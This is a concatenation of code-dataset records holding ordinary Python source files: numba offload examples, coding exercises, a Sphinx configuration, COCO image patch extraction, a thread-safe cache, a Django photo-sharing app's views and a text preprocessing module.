np\nfrom numba import njit\n\nimport numba_dppy as dppy\n\n\n@njit\ndef f1(a, b):\n c = a + b\n return c\n\n\ndef main():\n global_size = 64\n local_size = 32\n N = global_size * local_size\n print(\"N\", N)\n\n a = np.ones(N, dtype=np.float32)\n b = np.ones(N, dtype=np.float32)\n\n print(\"a:\", a, hex(a.ctypes.data))\n print(\"b:\", b, hex(b.ctypes.data))\n\n # Use the environment variable SYCL_DEVICE_FILTER to change\n # the default device. See\n # https://github.com/intel/llvm/blob/sycl/sycl/doc/EnvironmentVariables.md#sycl_device_filter.\n device = dpctl.select_default_device()\n print(\"Using device ...\")\n device.print_device_info()\n\n with dppy.offload_to_sycl_device(device):\n c = f1(a, b)\n\n print(\"RESULT c:\", c, hex(c.ctypes.data))\n for i in range(N):\n if c[i] != 2.0:\n print(\"First index not equal to 2.0 was\", i)\n break\n\n print(\"Done...\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numba_dppy/examples/auto_offload_examples/sum-1d.py","file_name":"sum-1d.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"46423331","text":"\"\"\"\nProblem Statement:\nGiven a sorted array arr[] of distinct integers. Sort the array into a wave-like array and return it. In other words, arrange the elements into a sequence such that a1 >= a2 <= a3 >= a4 <= a5..... (considering the increasing lexicographical order).\nExample 1:\nInput:\nN = 5\narr[] = {1,2,3,4,5}\nOutput: 2 1 4 3 5\nExplanation: Array elements after \nsorting it in wave form are \n2 1 4 3 5.\n \nExample 2:\nInput:\nN = 6\narr[] = {2,4,7,8,9,10}\nOutput: 4 2 8 7 10 9\nExplanation: Array elements after \nsorting it in wave form are \n4 2 8 7 10 9.\nYour Task:\nThe task is to complete the function convertToWave() which converts the given array to wave array.\n\"\"\"\ndef convertToWave(array):\n N = len(array)\n i=0\n while(i') == -1:\n if i.decode('utf-8') != '':\n w_file.write(i)\n\n elif i.decode('utf-8') == '':\n w_file.write(' 1 \\n'.encode('utf-8'))\n w_file.write(''.encode('utf-8'))\n else:\n continue\n\n\nwrite_xml('version.xml')\n","sub_path":"fg_Tools/init_resource/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"121597740","text":"# 01_02_06\n\nfrom functools import lru_cache\n\ncounter = 0\n\n\n# 再帰関数の例\ndef calc_fib(n):\n global counter\n counter += 1\n if n in [1, 2]:\n return 1\n else:\n return calc_fib(n - 1) + calc_fib(n - 2)\n\n\nprint('フィボナッチ数:', calc_fib(25))\nprint(counter, \"回の関数呼び出し\")\n# フィボナッチ数:75025\n# 150049 回の関数呼び出し\n\n\n@lru_cache(maxsize=1024)\ndef fib2(n):\n global counter\n counter += 1\n if n in [1, 2]:\n return 1\n return fib2(n - 1) + fib2(n - 2)\n\n\nprint('フィボナッチ数:', fib2(25))\nprint(counter, \"回の関数呼び出し\")\n# フィボナッチ数:75025\n# 25 回の関数呼び出し\n\nprint((lambda a, b: a * b)(3, 10))\n\n\ndef calc_double(x):\n return x ** 2\n\n\nfor num in [1, 2, 3, 4]:\n print(calc_double(num))\n\nprint(list(map(calc_double, [1, 2, 3, 4])))\nprint(list(map(lambda x: x ** 2, [1, 2, 3, 4])))\n\n\ninput_str = \"data Science\"\n\nfor str_index in range(len(input_str)):\n print(input_str[str_index])\n\nmaxN = 55\n\n\ndef sum_from_one(N):\n return int((N * (N + 1)) / 2)\n\n\nprint(sum_from_one(maxN))\n","sub_path":"01/01_02_05.py","file_name":"01_02_05.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"615715424","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport shlex\nimport sphinx_rtd_theme\n#import subprocess\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\nsys.path.insert(0, os.path.abspath('.')) # temporary, for plot_directive\n\nfrom acronyms import rst_epilog # This includes things like |HRTF| etc.\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = '1.3'\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\n#extensions = ['sphinx.ext.autodoc','nbsphinx','sphinx.ext.mathjax']\nextensions = [\n\t'sphinx.ext.autodoc',\n\t'sphinx.ext.viewcode',\n 'mathjax', # modified version to include clickable eq numbers\n 'plot_directive', # temporary, for :context:close-figs feature\n # When matplotlib > 1.4.3 is available on readthedocs, we can use this:\n #'matplotlib.sphinxext.plot_directive',\n\t#'matplotlib.sphinxext.only_directives',\n\t#'matplotlib.sphinxext.plot_directive',\n]\n\n# Enable numbering of figures and tables\nnumfig = True\n\n# Plot settings for matplot\nplot_include_source = True\nplot_html_show_source_link = False\nplot_html_show_formats = False\nplot_formats = ['png']\nplot_rcparams = {'figure.figsize' : [8, 4.5] }\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\nsource_suffix = '.txt'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'contents'\n\n# General information about the project. (substitutions)\nproject = 'Sound Field Synthesis'\ncopyright = '2016, SFS Toolbox Developers'\nauthor = 'SFS Toolbox Developers'\n\n# The full version, including alpha/beta/rc tags.\n#release = version\ntry:\n release = check_output(['git', 'describe', '--tags', '--always'])\n release = release.decode().strip()\nexcept Exception:\n release = ''\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build']\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\nadd_function_parentheses = True\n\n# The name of the Pygments (syntax highlighting) style to use.\n#pygments_style = 'sphinx'\npygments_style = 'trac'\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = False\n\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = \"sphinx_rtd_theme\"\n\n# Add any paths that contain custom themes here, relative to this directory.\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\nhtml_title = \"SFS Toolbox\"\n\n# A shorter title for the navigation bar. Default is the same as html_title.\nhtml_short_title = \"\"\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\nhtml_show_sphinx = False\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\n#html_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Language to be used for generating the HTML full-text search index.\n# Sphinx supports the following languages:\n# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'\n# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'\n#html_search_language = 'en'\n\n# A dictionary with options for the search language support, empty by default.\n# Now only 'ja' uses this config value\n#html_search_options = {'type': 'default'}\n\n# The name of a javascript file (relative to the configuration directory) that\n# implements a search results scorer. If empty, the default will be used.\n#html_search_scorer = 'scorer.js'\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'sfs-doc'\n\n\n# -- Options for LaTeX output ---------------------------------------------\n\nlatex_elements = {\n# The paper size ('letterpaper' or 'a4paper').\n#'papersize': 'letterpaper',\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n\n# Additional stuff for the LaTeX preamble.\n#'preamble': '',\n\n# Latex figure (float) alignment\n#'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, 'sfs-toolbox-documentation.tex', u'SFS Toolbox -- Theory',\n u'SFS Toolbox team', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309383094","text":"import sys\nver = sys.version\nimport zipfile\nif ver[0] == '3':\n import urllib.request as urllib2 \nelse:\n import urllib2\nimport os.path\nfrom os import listdir\nfrom os.path import isfile, join\nimport os\nfrom pycocotools.coco import COCO\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nimport pylab\nimport math\nfrom skimage.transform import resize\n\n\ndef resize_patches_to_size(params):\n\n catName = params['category']\n save_dir = params['tmp_dir'] + 'training_data/'\n resize_value = params['resize_to']\n\n for curCat in catName:\n median_area = get_category_median_area(curCat, params)\n labels_file = params['tmp_dir'] + '{}_labels.txt'.format(curCat)\n check_folder(save_dir + '{}/'.format(curCat))\n cur_folder = save_dir + '{}/'.format(curCat)\n src_folder = params['tmp_dir'] + 'temporal_patches/{}/'.format(curCat)\n onlyfiles = [f for f in listdir(src_folder) if (isfile(join(src_folder, f)) and ('.jpg' in f))]\n labelFile = open(labels_file,\"w\")\n for img_path in onlyfiles:\n I = io.imread(src_folder+img_path)\n cur_area = I.shape[0]*I.shape[1]\n resized_image = resize(I, (resize_value, resize_value),\n anti_aliasing=False)\n io.imsave(cur_folder + img_path, resized_image)\n if params['regression']:\n\n c_label = (float(cur_area) / (params['resize_to']*params['resize_to']))*2 - 1\n txt = src_folder + img_path + ':' + str(c_label) + '\\n'\n labelFile.write(txt)\n\n else:\n\n if cur_area < median_area:\n txt = src_folder+img_path+':0\\n'\n labelFile.write(txt)\n else:\n txt = src_folder+img_path+':1\\n'\n labelFile.write(txt)\n labelFile.close()\n\n\ndef get_category_median_area(curCat,params):\n areaListPath = params['tmp_dir'] + 'areaList_{}.txt'.format(curCat)\n lfile = open(areaListPath)\n lines = []\n for line in lfile: \n line = int(line)\n lines.append(line)\n \n lfile.close()\n medianArea = median(lines)\n\n if params['median']>0:\n lines = np.array(lines)\n lines = abs(lines - medianArea)\n lines.sort(0)\n num_to_cut = len(lines)/100*params['median']\n num_to_cut = int(num_to_cut)\n threshold = lines[num_to_cut]\n create_median(curCat, medianArea, threshold, params)\n return medianArea\n\ndef filter_dataset(params):\n catName = params['category']\n setType = ['train2014','train2017','val2014','val2017']\n for cur_cat in catName:\n extract_temporal_caterories(setType,cur_cat,params)\n print_max_width_height(catName, params)\n\n\n\ndef extract_temporal_caterories(data_sets,curCat,params):\n\n save_dir = params['tmp_dir'] + 'temporal_patches'\n check_folder(save_dir)\n img_id = 0\n for cur_set in data_sets:\n save_path = save_dir + '/{}/'.format(curCat)\n check_folder(save_path)\n dataDir=os.getcwd()\n annFile='{}/data/annotations/instances_{}.json'.format(dataDir,cur_set)\n coco=COCO(annFile)\n catIds = coco.getCatIds(catNms=[curCat])[0]\n imgIds = coco.getImgIds(catIds=catIds )\n \n \n \n for cImgID in imgIds:\n img = coco.loadImgs(cImgID)[0]\n IPath = '{}/data/{}/{}'.format(os.getcwd(),cur_set,img['file_name'])\n I = io.imread(IPath)\n annIds = coco.getAnnIds(imgIds=img['id'])\n anns = coco.loadAnns(annIds)\n #show_images(I)\n cAnn_id = 0\n \n inc_id = False\n\n for cAnn in anns:\n cID = cAnn['category_id']\n if cID != catIds:\n continue\n bbox = cAnn['bbox']\n bbox[0] = math.trunc(bbox[0])\n bbox[1] = math.trunc(bbox[1])\n bbox[2] = math.trunc(bbox[2]+1)\n bbox[3] = math.trunc(bbox[3]+1)\n cropped = I[bbox[1]:(bbox[1]+bbox[3]),bbox[0]:(bbox[0]+bbox[2])]\n cur_im_path = save_path +'{}_{}.jpg'.format( str(img_id), str(cAnn_id))\n\n #show_images(cropped)\n # filtering\n is_accepted = accepted_by_size(cropped, params)\n if is_accepted:\n io.imsave(cur_im_path, cropped)\n cAnn_id = cAnn_id + 1\n inc_id = True\n if inc_id:\n img_id += 1\n\n\ndef accepted_by_size(cropped, params):\n result = True\n\n smallest_size = min(cropped.shape[0],cropped.shape[1])\n largest_size = max(cropped.shape[0],cropped.shape[1])\n\n if params['smallest_axe']>0:\n if smallest_size<=params['smallest_axe']:\n result = False\n if params['largest_axe']>0:\n if largest_size>=params['largest_axe']:\n result = False\n return result\n\n \ndef save_area(cur_area_path, segArea):\n res_file = open(cur_area_path,\"a\") \n res_file.write(str(segArea))\n res_file.close() \n\ndef print_max_width_height(catName,params):\n result = []\n maxH = 0\n maxW = 0\n for curCat in catName:\n\n path = params['tmp_dir'] + 'temporal_patches/{}/'.format(curCat)\n onlyfiles = [f for f in listdir(path) if (isfile(join(path, f)) and ('.jpg' in f))]\n cur_file_name = params['tmp_dir'] + 'areaList_{}.txt'.format(curCat)\n\n fl = open(cur_file_name,\"w\") \n areaList = []\n for impath in onlyfiles:\n cfilePath = path + impath\n I = io.imread(cfilePath)\n maxH=max(maxH, I.shape[0])\n maxW=max(maxW, I.shape[1])\n fl.write(str(I.shape[0]*I.shape[1])+'\\n' )\n areaList.append(I.shape[0]*I.shape[1])\n message = 'Category Name: ' + curCat + '\\n'\n message += 'Maximum Height: ' + str(maxW)+'\\n'\n message += 'Maximum Width: ' + str(maxW)+'\\n'\n message += 'Image Area Saved to: ' + cur_file_name+'\\n\\n\\n'\n \n fl.close()\n return result\n\n\ndef create_median(catName, med_val, threshold, params):\n\n\n path = params['tmp_dir'] + 'temporal_patches/{}/'.format(catName)\n onlyfiles = [f for f in listdir(path) if (isfile(join(path, f)) and ('.jpg' in f))]\n for fname in onlyfiles:\n fpath = path +fname\n img = io.imread(fpath)\n cArea = img.shape[0]*img.shape[1]\n if abs(cArea-med_val) maior:\n maior = peso\n if peso < menor:\n menor = peso\nprint(f'O menor peso é {menor}')\nprint(f'O maior peso é {maior}')\n","sub_path":"Exercícios curso em video/Exercicios/ex055.py","file_name":"ex055.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"460548013","text":"import threading\n\n\nclass ThreadSafeCache:\n def __init__(self):\n self.lock = threading.Lock()\n self.cache = {}\n\n def get(self, key, func):\n with self.lock:\n entry = self.cache.setdefault(key, {\n \"done\": False,\n \"value\": None,\n \"exception\": None\n })\n\n def do_ret():\n if entry[\"exception\"] is not None:\n raise entry[\"exception\"]\n return entry[\"value\"]\n\n if entry[\"done\"]:\n return do_ret()\n\n try:\n entry[\"value\"] = func()\n except Exception as e:\n entry[\"exception\"] = e\n entry[\"done\"] = True\n return do_ret()\n\nclass ThreadSafeMultiCache:\n def __init__(self):\n self.cache = ThreadSafeCache()\n\n def get(self, cache_key, key, func):\n cache = self.cache.get(cache_key, lambda: ThreadSafeCache())\n return cache.get(key, func)\n","sub_path":"kluctl/utils/thread_safe_cache.py","file_name":"thread_safe_cache.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"130482289","text":"from __future__ import unicode_literals\nfrom ase.gui.i18n import _\n\nimport ase.gui.ui as ui\nfrom ase.gui.widgets import Element\n\n\ndef txt2pos(txt):\n try:\n x, y, z = (float(x) for x in txt.split(','))\n except ValueError as ex:\n ui.error(_('Bad position'), ex)\n else:\n return x, y, z\n\n\nclass AddAtoms:\n def __init__(self, gui):\n win = ui.Window(_('Add atoms'))\n self.element = Element()\n win.add(self.element)\n self.absolute_position = ui.Entry('0,0,0')\n self.relative_position = ui.Entry('1.5,0,0')\n win.add([_('Absolute position:'),\n self.absolute_position,\n ui.Button(_('Add'), self.add_absolute)])\n win.add([_('Relative to average position (of selection):'),\n self.relative_position,\n ui.Button(_('Add'), self.add_relative)])\n self.gui = gui\n\n def add_absolute(self):\n pos = txt2pos(self.absolute_position.value)\n self.add(pos)\n\n def add_relative(self):\n rpos = txt2pos(self.relative_position.value)\n pos = self.gui.images.P[self.gui.frame]\n if self.gui.images.selected.any():\n pos = pos[self.gui.images.selected]\n center = pos.mean(0)\n self.add(center + rpos)\n\n def add(self, pos):\n if pos is None or self.element.symbol is None:\n return\n atoms = self.gui.images.get_atoms(self.gui.frame)\n atoms.append(self.element.symbol)\n atoms.positions[-1] = pos\n self.gui.new_atoms(atoms, init_magmom=True)\n self.gui.images.selected[:] = False\n self.gui.images.selected[-1] = True\n self.gui.draw()\n","sub_path":"gui/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"175071854","text":"def chooseDice(self):\n choices = []\n while True:\n b = self.choose([\"Die 1\", \"Die 2\", \"Die 3\", \"Die 4\", \"Die 5\",\n\n \"Roll Dice\", \"Score\"])\n\n if b[0] == \"D\": # User clicked a die button\n i = eval(b[4]) - 1\n if i in choices:\n choices.remove(i)\n self.dice[i].setColor(\"black\")\n else:\n choices.append(i)\n self.dice[i].setColor(\"gray\")\n else:\n for d in self.dice:\n d.setColor(\"black\")\n if b == \"Score\":\n return []\n elif choices != []:\n return choices\n","sub_path":"yuki/rocket/ch12/ch12_32.py","file_name":"ch12_32.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"594624858","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom . models import *\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import ProfileForm,CommentsForm, ImageForm\nfrom django.contrib.auth import login\n\n# Create your views here.\n\n@login_required(login_url='/accounts/login/')\ndef index(request):\n images=Image.objects.all()\n print(\"our images\",images)\n comments=Comments.objects.all()\n profile = Profile.objects.all()\n return render(request,'instagram/index.html',{\"images\":images,\"comments\":comments, \"profile\":profile})\n\n\n@login_required\ndef profile(request):\n current_user=request.user\n profile_info = Profile.objects.filter(user=current_user).first()\n posts = request.user.image_set.all()\n return render(request,'registration/profile.html',{\"images\":posts,\"profile\":profile_info,\"current_user\":current_user})\n\ndef search_username(request):\n\n if 'search_username' in request.GET and request.GET[\"search_username\"]:\n searched_name = request.GET.get(\"search_username\")\n searched_user = User.objects.filter(username__icontains=search_username)\n message = f\"{searched_name}\"\n\n return render(request, 'search.html', {\"message\": message, \"username\": username})\n\n else:\n message = \"Sorry, No one by this username\"\n return render(request, 'instagram/search.html', {\"message\": message})\n \ndef upload_image(request):\n current_user = request.user\n if request.method == 'POST':\n form = ImageForm(request.POST,request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n return redirect('index')\n\n else:\n form = ImageForm()\n return render(request,'instagram/upload_image.html', {\"form\":form})\n\n\n@login_required (login_url='/accounts/register/') \ndef image_likes(request,id):\n image = Image.get_single_photo(id)\n user = request.user\n user_id = user.id\n \n if user.is_authenticated:\n \n image.save()\n \n return redirect('index')\n\ndef add_comment(request,id):\n current_user = request.user\n image = Image.get_single_photo(id=id)\n if request.method == 'POST':\n form = CommentsForm(request.POST)\n print(form)\n \n if form.is_valid():\n comment = form.save(commit=False)\n comment.user = current_user\n comment.image_id = id\n comment.save()\n return redirect('index')\n\n else:\n form = CommentsForm()\n return render(request,'instagram/add_comment.html',{\"form\":form,\"image\":image}) \n \ndef edit_profile(request):\n current_user = request.user\n if request.method == 'POST':\n form = ProfileForm(request.POST,request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n return redirect('profile')\n\n else:\n form = ProfileForm()\n return render(request,'registration/edit_profile.html',{\"form\":form})\n \n \ndef create_post(request):\n current_user = request.user\n if request.method == 'POST':\n form = ImageForm(request.POST,request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n return redirect('index')\n\n else:\n form = ImageForm()\n return render(request,'instagram/new_post.html',{\"form\":form})\n \n ","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"62194464","text":"import nltk\r\nimport re\r\n#import spacy\r\n#from nltk import word_tokenize\r\nfrom bs4 import BeautifulSoup\r\nimport unicodedata\r\nfrom contractions import CONTRACTION_MAP\r\nfrom nltk.corpus import wordnet\r\n#import collections\r\nfrom nltk.tokenize.toktok import ToktokTokenizer\r\nfrom bs4 import BeautifulSoup\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import stopwords\r\nimport en_core_web_sm\r\nimport pandas as pd\r\nimport sys\r\n\r\nfrom nltk.corpus import words\r\nengwords = words.words()\r\n\r\n\r\n\r\n###########################################################################################################################\r\n# Author : Tapas Mohanty \r\n# Functionality : Pre-Processing removal different procedures \r\n###########################################################################################################################\r\n\r\ntokenizer = ToktokTokenizer()\r\nstopword_list = nltk.corpus.stopwords.words('english')\r\n# nlp = spacy.load('en', parse=True, tag=True, entity=True)\r\nnlp = en_core_web_sm.load()\r\n# nlp_vec = spacy.load('en_vectors_web_lg', parse=True, tag=True, entity=True)\r\n\r\n\r\n\r\ndef strip_html_tags(text):\r\n soup = BeautifulSoup(text, \"html.parser\")\r\n if bool(soup.find()):\r\n [s.extract() for s in soup(['iframe', 'script'])]\r\n stripped_text = soup.get_text()\r\n stripped_text = re.sub(r'[\\r|\\n|\\r\\n]+', '\\n', stripped_text)\r\n stripped_text = re.sub(r'''(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))''', \" \", stripped_text) \r\n else:\r\n stripped_text = text\r\n # print('Strip html tags completed')\r\n return stripped_text\r\n\r\n\r\ndef simple_porter_stemming(text):\r\n ps = nltk.porter.PorterStemmer()\r\n text = ' '.join([ps.stem(word) for word in text.split()]) \r\n # print('Stemming completed')\r\n return text\r\n\r\n\r\n\r\ndef lemmatize_text(text):\r\n text = nlp(text)\r\n text = ' '.join([word.lemma_ if word.lemma_ != '-PRON-' else word.text for word in text])\r\n # print('Lemmatiation completed')\r\n return text\r\n\r\n\r\ndef remove_repeated_words(text):\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n seen = set()\r\n seen_add = seen.add\r\n\r\n def add(x):\r\n seen_add(x) \r\n return x\r\n text = ' '.join(add(i) for i in tokens if i not in seen)\r\n # print('remove repeated words completed')\r\n return text\r\n \r\n \r\ndef remove_repeated_characters(text):\r\n repeat_pattern = re.compile(r'(\\w*)(\\w)\\2(\\w*)')\r\n match_substitution = r'\\1\\2\\3'\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n def replace(old_word):\r\n if wordnet.synsets(old_word):\r\n return old_word\r\n new_word = repeat_pattern.sub(match_substitution, old_word)\r\n return replace(new_word) if new_word != old_word else new_word\r\n \r\n correct_tokens = [replace(word) for word in tokens]\r\n # print('remove repeated characters')\r\n return correct_tokens\r\n\r\n\r\ndef expand_contractions(text, contraction_mapping=CONTRACTION_MAP):\r\n \r\n contractions_pattern = re.compile('({})'.format('|'.join(contraction_mapping.keys())), \r\n flags=re.IGNORECASE|re.DOTALL)\r\n def expand_match(contraction):\r\n match = contraction.group(0)\r\n first_char = match[0]\r\n expanded_contraction = contraction_mapping.get(match)\\\r\n if contraction_mapping.get(match)\\\r\n else contraction_mapping.get(match.lower()) \r\n expanded_contraction = first_char+expanded_contraction[1:]\r\n return expanded_contraction\r\n \r\n expanded_text = contractions_pattern.sub(expand_match, text)\r\n expanded_text = re.sub(\"'\", \"\", expanded_text)\r\n # print('expand contractions completed')\r\n return expanded_text\r\n\r\n\r\ndef remove_accented_chars(text):\r\n text = unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('utf-8', 'ignore')\r\n # print('removal accented chars')\r\n return text\r\n\r\n\r\ndef remove_special_characters(text, remove_digits=False):\r\n pattern = r'[^a-zA-Z0-9\\s]|\\[|\\]' if not remove_digits else r'[^a-zA-Z\\s]|\\[|\\]'\r\n text = re.sub(pattern, '', text)\r\n # print('removal special characters completed')\r\n return text\r\n\r\n\r\ndef remove_stopwords(text, is_lower_case=False, stopwords = stopword_list):\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n if is_lower_case:\r\n filtered_tokens = [token for token in tokens if token not in stopwords]\r\n else:\r\n filtered_tokens = [token for token in tokens if token.lower() not in stopwords]\r\n filtered_text = ' '.join(filtered_tokens) \r\n # print('removal stopwords completed')\r\n return filtered_text\r\n\r\ndef custom_stopwords(text, custok):\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n filtered_custokens = [token for token in tokens if token not in custok]\r\n filtered_text = ' '.join(filtered_custokens) \r\n # print('removal custom stopwords completed')\r\n return filtered_text\r\n \r\ndef get_keywords(text, eng_words = engwords):\r\n tokens = tokenizer.tokenize(text)\r\n eng_tokens = [token for token in tokens if token in eng_words]\r\n eng_text = ' '.join(eng_tokens) \r\n # print('removal of non-english keywords completed')\r\n return eng_text\r\n \r\ndef col_keyword(pData, pTktDesc, column):\r\n try:\r\n pData['combined'] = pData[column].apply(lambda row: ' '.join(row.values.astype(str)), axis=1)\r\n pData[pTktDesc] = ([' '.join(set(a.split(' ')).difference(set(b.split(' ')))) for a, b in zip(pData[pTktDesc], pData['combined'])])\r\n del pData['combined']\r\n except Exception as e:\r\n print('*** Error[001]: ocurred while combining column')\r\n return pData\r\n\r\n\r\ndef normalize_corpus(corpus, html_stripping= True, contraction_expansion= True,\r\n accented_char_removal= True, text_lower_case= True, \r\n text_stemming= False, text_lemmatization= True, \r\n special_char_removal= True, remove_digits= True,\r\n stopword_removal= True, ewords = True,\r\n custm_stpwrds= True, stopwords=stopword_list,\r\n remove_rptd_wrds= True, eng_words = engwords):\r\n \r\n normalized_corpus = []\r\n # normalize each document in the corpus\r\n \r\n custok = []\r\n with open('stopwords.txt', 'r') as f:\r\n for word in f:\r\n word = word.split('\\n')\r\n custok.append(word[0])\r\n print('--> preprocessing started') \r\n for index, doc in enumerate(corpus):\r\n # print(index) \r\n try: \r\n # strip HTML\r\n if html_stripping:\r\n doc = strip_html_tags(doc)\r\n except Exception as e:\r\n print('*** Error[002]: ocurred in html_stripping on row no: ', index)\r\n\r\n try: \r\n # remove extra newlines\r\n doc = doc.translate(doc.maketrans(\"\\n\\t\\r\", \" \"))\r\n except Exception as e:\r\n print('*** Error[003] ocurred on row no: ', index)\r\n \r\n try: \r\n # remove accented characters\r\n if accented_char_removal:\r\n doc = remove_accented_chars(doc)\r\n except Exception as e:\r\n print('*** Error[004]: ocurred in accented_char_removal on row no: ', index)\r\n \r\n try: \r\n # expand contractions \r\n if contraction_expansion:\r\n doc = expand_contractions(doc)\r\n except Exception as e:\r\n print('*** Error[005] ocurred in contraction_expansion on row no: ', index)\r\n \r\n try: \r\n # lemmatize text\r\n if text_lemmatization:\r\n doc = lemmatize_text(doc)\r\n except Exception as e:\r\n print('*** Error[006]: ocurred in text_lemmatization on row no: ', index)\r\n \r\n try: \r\n # stem text\r\n if text_stemming and not text_lemmatization:\r\n doc = simple_porter_stemming(doc)\r\n except Exception as e:\r\n print('*** Error[007]: ocurred in text_stemming on row no: ', index)\r\n \r\n try:\r\n # remove special characters and\\or digits \r\n if special_char_removal:\r\n # insert spaces between special characters to isolate them \r\n special_char_pattern = re.compile(r'([{.(-)!}])')\r\n doc = special_char_pattern.sub(\" \\\\1 \", doc)\r\n doc = remove_special_characters(doc, remove_digits=remove_digits) \r\n except Exception as e:\r\n print('*** Error[008] ocurred in special_char_removal on row no: ', index)\r\n \r\n try: \r\n # remove extra whitespace\r\n doc = re.sub(' +', ' ', doc)\r\n except Exception as e:\r\n print('*** Error[009]: ocurred on row no: ', index)\r\n \r\n try:\r\n # lowercase the text \r\n if text_lower_case:\r\n doc = doc.lower()\r\n except Exception as e:\r\n print('*** Error[010]: ocurred in text_lower_case on row no: ', index)\r\n \r\n try: \r\n # remove stopwords\r\n if stopword_removal:\r\n doc = remove_stopwords(doc, is_lower_case=text_lower_case, stopwords = stopwords)\r\n except Exception as e:\r\n print('*** Error[011]: ocurred in stopword_removal on row no: ', index)\r\n\r\n try: \r\n #Remove non-english keywords\r\n if eng_words:\r\n doc = get_keywords(doc, eng_words = eng_words)\r\n except Exception as e:\r\n print('*** Error[012]: ocurred in ewords on row no: ', index)\r\n\r\n try: \r\n #Remove custom keywords\r\n if custm_stpwrds:\r\n doc = custom_stopwords(doc, custok)\r\n\r\n # remove extra whitespace\r\n doc = re.sub(' +', ' ', doc)\r\n doc = doc.strip()\r\n except Exception as e:\r\n print('*** Error[013]: ocurred in custm_stpwrds on row no: ', index)\r\n\r\n try: \r\n #Remove repeated words\r\n if remove_rptd_wrds:\r\n doc = remove_repeated_words(doc)\r\n # remove extra whitespace\r\n doc = re.sub(' +', ' ', doc)\r\n doc = doc.strip()\r\n except Exception as e:\r\n print('*** 